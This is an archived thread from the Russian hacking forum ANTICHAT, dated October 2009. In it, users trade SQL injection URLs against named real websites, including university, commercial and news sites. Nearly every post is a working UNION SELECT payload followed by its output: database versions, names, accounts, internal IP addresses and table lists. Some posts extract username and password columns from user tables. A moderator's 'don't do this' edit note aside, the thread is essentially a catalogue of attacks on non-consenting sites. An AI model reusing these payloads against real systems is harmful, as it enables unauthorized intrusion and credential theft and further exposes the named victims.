ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11051  
Старый 29.10.2009, 15:28
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Код:
http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
5.0.24a-Debian_9ubuntu2.4-log:musics:musics@localhost

and...

Код:
http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,unhex(hex(concat_ws(0x3a,username,password))),3,4,5,6,7,8,9+from+tele.auth_user_md5--

Последний раз редактировалось 547; 29.10.2009 в 15:32..
 
Ответить с цитированием

  #11052  
Старый 29.10.2009, 18:25
onbka
Новичок
Регистрация: 29.10.2009
Сообщений: 15
Провел на форуме:
109810

Репутация: 17
По умолчанию

Цитата:
http://www.newhorizons.com.ua/news_detail.php?id=-72 union select 1,2,3,4,5,concat_ws (0x3a,user(),d atabase(),version()),7,8 --
u_newhorizon@localhost
newhorizons
5.0.51a-24+lenny2-log
 
Ответить с цитированием

  #11053  
Старый 29.10.2009, 20:04
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

http://www.tele.ucl.ac.be/musics/news.php?view=item&id=-97070019+union+select+1,concat_ws(0x3a,version(),d atabase(),user()),3,4,5,6,7,8,9--

usrmcv@localhost:fmcr:5.1.36-0.dotdeb.0
 
Ответить с цитированием

  #11054  
Старый 29.10.2009, 21:45
^YaHoo^
Banned
Регистрация: 02.01.2009
Сообщений: 29
Провел на форуме:
178075

Репутация: 85
Отправить сообщение для ^YaHoo^ с помощью ICQ
По умолчанию

Код:
http://www.iase.ru/objects.php?group=1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())/*
5.0.45:iase@localhost:iase

Код:
http://www.newfazenda.ru/user/about.php?id=-1/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())
5.0.75:novysvetru@78.108.81.161:novysvetru_fazend

Код:
http://www.teplo-spb.ru/catalog?id=48&maker=-1/**/union/**/select/**/1,2,3,4,concat_ws(0x3a,user%20(),database(),version()),6,7,8,9,10,11,12/*
teplospbru@localhost:teplospbru:5.0.26-lk-log
 
Ответить с цитированием

скуля
  #11055  
Старый 30.10.2009, 00:57
crazy~driver
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983

Репутация: 39
Отправить сообщение для crazy~driver с помощью ICQ
По умолчанию скуля

http://www.sportscow.com/scoreboard.php?yid=0910&sport=101+and+1=2+union+se lect+version()%20#


http://www.craigolsonsports.com/feature.php?fid=8+and+1=2+union+select+COLUMN_NAME ,2,3+from+information_schema.COLUMNS+where+TABLE_N AME=0x7573657273+--+
 
Ответить с цитированием

  #11056  
Старый 30.10.2009, 02:29
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.autore.biz/content.php?id=6+UNION+SELECT+1,2+LIMIT+1,1

Database Version: 4.1.14
Database name: autoredb
User name: autore@localhost
mysql.user found in DB


http://www.dieselchiptuning.biz/pages/content.php?id=3+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13

Database Version: 5.0.22
Database name: beena
User name: beena@localhost
таблицы
Код:
16 :In database beena found table aantekening
17 :In database beena found table abbreviations
18 :In database beena found table bedrijf
19 :In database beena found table bedrijfsgegevens
20 :In database beena found table budget
21 :In database beena found table contacten
22 :In database beena found table contactpersonen
23 :In database beena found table contactpersonen_old
24 :In database beena found table credits
25 :In database beena found table customers
26 :In database beena found table dct_email
27 :In database beena found table dealers
28 :In database beena found table emailadressen
29 :In database beena found table errormail
30 :In database beena found table logging
31 :In database beena found table mailinglist
32 :In database beena found table mailinglist_copy
33 :In database beena found table nieuwsbrief
34 :In database beena found table nieuwsbrief_copy
35 :In database beena found table nieuwsbrief_item
36 :In database beena found table onderdelen
37 :In database beena found table order_lost
38 :In database beena found table paragraaf
39 :In database beena found table product_type
40 :In database beena found table producten
41 :In database beena found table productgroepen
42 :In database beena found table sectoren
43 :In database beena found table shop_item
44 :In database beena found table shop_orders
45 :In database beena found table talen
46 :In database beena found table tips
47 :In database beena found table typen
48 :In database beena found table userrights
49 :In database beena found table vaste_teksten
50 :In database beena found table visitors
51 :In database beena found table voertuigen
52 :In database beena found table voertuigen_copy
53 :In database beena found table voertuigen_copy_copy
54 :In database beena found table voertuigen_old

Последний раз редактировалось Rubaka; 30.10.2009 в 02:40..
 
Ответить с цитированием

  #11057  
Старый 30.10.2009, 04:10
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189

Репутация: 124
По умолчанию

The B.O.S.S. Board:

Код:
http://www.thebossboard.com/article.php?newid=-1+union+select+1,2,3,4,5,6--
DB Version: 4.1.22-max-log
DB name: bossboard
DB user: bossboard@97.74.144.124

Код:
http://dl.game.21cn.com/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Version: 4.0.20-log
Database: pise
User: pise@59.36.102.212

Последний раз редактировалось jokester; 30.10.2009 в 11:24.. Причина: Не надо так делать
 
Ответить с цитированием

  #11058  
Старый 30.10.2009, 17:16
^YaHoo^
Banned
Регистрация: 02.01.2009
Сообщений: 29
Провел на форуме:
178075

Репутация: 85
Отправить сообщение для ^YaHoo^ с помощью ICQ
По умолчанию

Код:
http://www.gangotri.ru/cs?action=itemd&itid=-960+union+select+concat_ws(0x3a,user(),database(),version())--
b2005321_1@localhost:2005321_1:5.0.51-log- в исходнике

Код:
http://www.muscul.ru/article.php?id=-8/**/union/**/select/**/1,2,user(),version(),5,6,7,8,9/*
musculr4_first@localhost 4.1.25-log

Код:
http://www.watches.ru/index.php?page=30&art=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())/*
lukonin@localhost:newwatches:4.1.25
 
Ответить с цитированием

  #11059  
Старый 30.10.2009, 21:01
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Код:
http://www.ukrlogistica.com.ua/news.php?id=-370+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6--
jstudio_test:jstudio_Si@localhost:4.1.22-standard-log

Код:
http://www.e-portal.com.ua/news.php?id=-8+union+select+1,group_concat(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13--
:ukrfoto_user@192.168.2.3ukrfoto_db5.0.51a-log

Последний раз редактировалось 547; 30.10.2009 в 21:24..
 
Ответить с цитированием

  #11060  
Старый 30.10.2009, 23:15
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Студия 3Dform
Код:
http://3dform.ru/?lg=se&a=portfolio&project=37&id_service=7&id=229%20union%20select%201,2,3,4,5,6,concat_ws%280x3a,nikname,password%29,8,9,10,11,12%20from%20user%20--
a7489_2:a7489_2@95.142.35.1:5.0.75-percona-highperf-b11-log
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ